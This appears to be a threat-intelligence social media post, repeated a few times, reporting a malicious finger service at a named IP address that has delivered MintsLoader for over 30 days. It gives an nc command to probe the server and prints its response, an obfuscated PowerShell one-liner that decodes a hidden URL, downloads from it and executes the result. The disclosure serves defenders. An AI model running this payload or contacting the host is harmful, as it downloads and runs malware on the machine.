This malicious finger service on 64.190.113.206 (AS399629 / BL Networks) has delivered #MintsLoader for 30+ days and is still up and running!

netresec@infosec.exchange

RE: https://infosec.exchange/@netresec/115905237000922504

This malicious finger service on 64.190.113.206 (AS399629 / BL Networks) has delivered #MintsLoader for 30+ days and is still up and running!

You can probe it with:
nc 64.190.113.206 79 <<< rcaptcha

The malicious "finger" service now gives this response:
powershell -w h $huwcsxf='ur' ;set-alias hf7wz32e c$($huwcsxf)l;$infqtmrw=(2231,2243,2243,2239,2185,2174,2174,2237,2248,2224,2229,2243,2245,2249,2177,2173,2243,2238,2239,2174,2176,2173,2239,2231,2239,2190,2242,2188,2177,2180,2226,2179,2180,2228,2229,2228,2172,2176,2177,2225,2183,2172,2179,2228,2176,2227,2172,2225,2184,2175,2225,2172,2227,2225,2225,2224,2182,2226,2228,2227,2177,2176,2224,2226);$zpsmnihtrogcqb=('reicporet','get-cmdlet');$gsrwpaztvi=$infqtmrw;foreach($yxbwqtafvdn in $gsrwpaztvi){$ptwnmclaqfgh=$yxbwqtafvdn;$wyngvtsfirm=$wyngvtsfirm+[char]($ptwnmclaqfgh-2127);$ljfaixwhpztnkv=$wyngvtsfirm; $axfzykqljsnrwc=$ljfaixwhpztnkv};$uecbvofzghikt[2]=$axfzykqljsnrwc;$sdypqv='rl';$gkmvohls=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(hf7wz32e -useb $axfzykqljsnrwc)

#threatintel

CIRCLE WITH A DOT

This malicious finger service on 64.190.113.206 (AS399629 / BL Networks) has delivered #MintsLoader for 30+ days and is still up and running!